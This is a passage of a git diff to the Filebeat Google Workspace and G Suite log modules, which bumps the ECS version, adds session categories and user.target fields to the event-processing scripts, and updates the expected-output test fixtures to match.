+1685,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1672,7 +1750,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1740,6 +1821,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/groups/config/config.yml b/x-pack/filebeat/module/google_workspace/groups/config/config.yml index cc16979b0a23..6d713ebdb29b 100644 --- a/x-pack/filebeat/module/google_workspace/groups/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/groups/config/config.yml @@ -15,11 +15,11 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' response.split: target: body.items split: - target: events + target: body.events keep_parent: true response.pagination: - set: @@ -45,7 +45,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/groups/config/pipeline.js b/x-pack/filebeat/module/google_workspace/groups/config/pipeline.js index 7f91d9db844d..5b3029af0f4d 100644 --- a/x-pack/filebeat/module/google_workspace/groups/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/groups/config/pipeline.js @@ -129,6 +129,17 @@ var groups = (function () { } evt.AppendTo("related.user", data[0]); + evt.Put("user.target.name", data[0]); + evt.Put("user.target.domain", data[1]); + evt.Put("user.target.email", email); + var groupName = evt.Get("group.name"); + if (groupName) { + evt.Put("user.target.group.name", groupName); + } + var groupDomain = evt.Get("group.domain"); + if (groupDomain) { + evt.Put("user.target.group.domain", groupDomain); + } }; var pipeline = new processor.Chain() diff --git a/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json index 1a1293419813..5faa1d30d539 100644 --- a/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json @@ -57,7 +57,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -110,7 +113,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -165,7 +171,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -218,7 +232,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -271,7 +288,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -327,7 +347,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -379,7 +402,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -431,7 +457,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -487,7 +516,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -542,7 +574,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -598,7 +633,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -653,7 +691,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -709,7 +750,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -765,7 +809,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -821,7 +868,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -877,7 +927,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -933,7 +986,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -989,7 +1045,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1045,7 +1109,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1101,7 +1173,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1156,7 +1236,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1211,7 +1299,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1266,7 +1362,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1321,7 +1425,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1376,6 +1488,14 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/login/config/config.yml b/x-pack/filebeat/module/google_workspace/login/config/config.yml index d50bfdab9dc9..3ce48abe77bc 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/login/config/config.yml @@ -15,11 +15,11 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' response.split: target: body.items split: - target: events + target: body.events keep_parent: true response.pagination: - set: @@ -45,7 +45,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/login/config/pipeline.js b/x-pack/filebeat/module/google_workspace/login/config/pipeline.js index 62b5b8a75425..9f9610393f1c 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/login/config/pipeline.js @@ -9,14 +9,17 @@ var login = (function () { evt.Put("event.category", ["authentication"]); switch (evt.Get("event.action")) { case "login_failure": + evt.AppendTo("event.category", "session"); evt.Put("event.type", ["start"]); evt.Put("event.outcome", "failure"); break; case "login_success": + evt.AppendTo("event.category", "session"); evt.Put("event.type", ["start"]); evt.Put("event.outcome", "success"); break; case "logout": + evt.AppendTo("event.category", "session"); evt.Put("event.type", ["end"]); break; case "account_disabled_generic": @@ -83,9 +86,25 @@ var login = (function () { evt.Delete("json.events.parameters"); }; + var addTargetUser = function(evt) { + var affectedEmail = evt.Get("google_workspace.login.affected_email_address"); + if (affectedEmail) { + evt.Put("user.target.email", affectedEmail); + var data = affectedEmail.split("@"); + if (data.length !== 2) { + return; + } + + evt.Put("user.target.name", data[0]); + evt.Put("user.target.domain", data[1]); + evt.AppendTo("related.user", data[0]); + } + }; + var pipeline = new processor.Chain() .Add(categorizeEvent) .Add(processParams) + .Add(addTargetUser) .Build(); return { diff --git a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json index 9e26d2af48b8..48f7038df80e 100644 --- a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json @@ -47,7 +47,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -97,7 +103,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -147,7 +159,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -197,7 +215,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -245,13 +269,17 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "login_failure", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "google_workspace.login", "event.id": "1", @@ -297,7 +325,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -348,7 +379,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -400,13 +434,17 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "logout", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "google_workspace.login", "event.id": "1", @@ -449,13 +487,17 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "login_success", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "google_workspace.login", "event.id": "1", @@ -501,6 +543,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/saml/config/config.yml b/x-pack/filebeat/module/google_workspace/saml/config/config.yml index 46a744bc5706..da0641282fcf 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/saml/config/config.yml @@ -15,11 +15,11 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' response.split: target: body.items split: - target: events + target: body.events keep_parent: true response.pagination: - set: @@ -45,7 +45,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js b/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js index caf62937f7af..9a779f8dd884 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js @@ -7,7 +7,7 @@ var saml = (function () { var categorizeEvent = function(evt) { evt.Put("event.type", ["start"]); - evt.Put("event.category", ["authentication"]); + evt.Put("event.category", ["authentication", "session"]); switch (evt.Get("event.action")) { case "login_failure": evt.Put("event.outcome", "failure"); diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json index ff3ef42e1c86..90f6463ce340 100644 --- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json @@ -3,7 +3,8 @@ "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "login_failure", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "google_workspace.saml", "event.id": "1", @@ -52,13 +53,17 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:01.000Z", "event.action": "login_success", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "google_workspace.saml", "event.id": "1", @@ -105,6 +110,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml index 03fffe9f9f85..2219d3ba1a0d 100644 --- a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml @@ -15,11 +15,11 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' response.split: target: body.items split: - target: events + target: body.events keep_parent: true response.pagination: - set: @@ -45,7 +45,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json index ed49851f2918..cce07c42cf24 100644 --- a/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json @@ -46,7 +46,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -95,7 +98,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -144,7 +150,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -193,7 +202,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -242,7 +254,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -291,7 +306,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -340,7 +358,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -389,6 +410,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/config/config.yml b/x-pack/filebeat/module/gsuite/admin/config/config.yml index a0a3f17d8b77..12e3730dc939 100644 --- a/x-pack/filebeat/module/gsuite/admin/config/config.yml +++ b/x-pack/filebeat/module/gsuite/admin/config/config.yml @@ -39,7 +39,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/admin/config/pipeline.js b/x-pack/filebeat/module/gsuite/admin/config/pipeline.js index 8302ec5a1e58..9fdaa12998e7 100644 --- a/x-pack/filebeat/module/gsuite/admin/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/admin/config/pipeline.js @@ -422,6 +422,17 @@ var login = (function () { } evt.AppendTo("related.user", data[0]); + evt.Put("user.target.name", data[0]); + evt.Put("user.target.domain", data[1]); + evt.Put("user.target.email", email); + var groupName = evt.Get("group.name"); + if (groupName) { + evt.Put("user.target.group.name", groupName); + } + var groupDomain = evt.Get("group.domain"); + if (groupDomain) { + evt.Put("user.target.group.domain", groupDomain); + } }; var setEventDuration = function(evt) { diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-application-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-application-test.json.log-expected.json index e33c671e30b3..835566739674 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-application-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-application-test.json.log-expected.json @@ -54,7 +54,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_APPLICATION_SETTING", @@ -110,7 +113,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_APPLICATION_SETTING", @@ -166,7 +172,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REORDER_GROUP_BASED_POLICIES_EVENT", @@ -220,7 +229,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "GPLUS_PREMIUM_FEATURES", @@ -270,7 +282,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_MANAGED_CONFIGURATION", @@ -319,7 +334,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_MANAGED_CONFIGURATION", @@ -368,7 +386,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_MANAGED_CONFIGURATION", @@ -418,7 +439,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED", @@ -467,6 +491,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-calendar-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-calendar-test.json.log-expected.json index 110753ae98de..10e0ec1aac41 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-calendar-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-calendar-test.json.log-expected.json @@ -46,7 +46,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_BUILDING", @@ -95,7 +98,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_BUILDING", @@ -147,7 +153,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_CALENDAR_RESOURCE", @@ -196,7 +205,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_CALENDAR_RESOURCE", @@ -245,7 +257,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_CALENDAR_RESOURCE_FEATURE", @@ -294,7 +309,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_CALENDAR_RESOURCE_FEATURE", @@ -343,7 +361,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_CALENDAR_RESOURCE_FEATURE", @@ -396,7 +417,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RENAME_CALENDAR_RESOURCE", @@ -446,7 +470,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_CALENDAR_RESOURCE", @@ -498,7 +525,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CALENDAR_SETTING", @@ -554,7 +584,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CANCEL_CALENDAR_EVENTS", @@ -603,7 +636,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "RELEASE_CALENDAR_RESOURCES", @@ -652,6 +691,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chat-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chat-test.json.log-expected.json index 0c7828946dab..5fde8049c7c5 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chat-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chat-test.json.log-expected.json @@ -45,7 +45,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MEET_INTEROP_DELETE_GATEWAY", @@ -93,7 +96,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MEET_INTEROP_MODIFY_GATEWAY", @@ -142,7 +148,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHAT_SETTING", @@ -198,6 +207,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chromeos-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chromeos-test.json.log-expected.json index e4a8b7141108..4627a127b8f8 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chromeos-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chromeos-test.json.log-expected.json @@ -54,7 +54,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DEVICE_STATE", @@ -105,7 +108,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_APPLICATION_SETTING", @@ -162,7 +168,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "SEND_CHROME_OS_DEVICE_COMMAND", @@ -211,7 +220,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_DEVICE_ANNOTATION", @@ -259,7 +271,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_DEVICE_SETTING", @@ -311,7 +326,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_DEVICE_STATE", @@ -362,7 +380,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING", @@ -414,7 +435,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "INSERT_CHROME_OS_PRINT_SERVER", @@ -462,7 +486,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_CHROME_OS_PRINT_SERVER", @@ -510,7 +537,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { 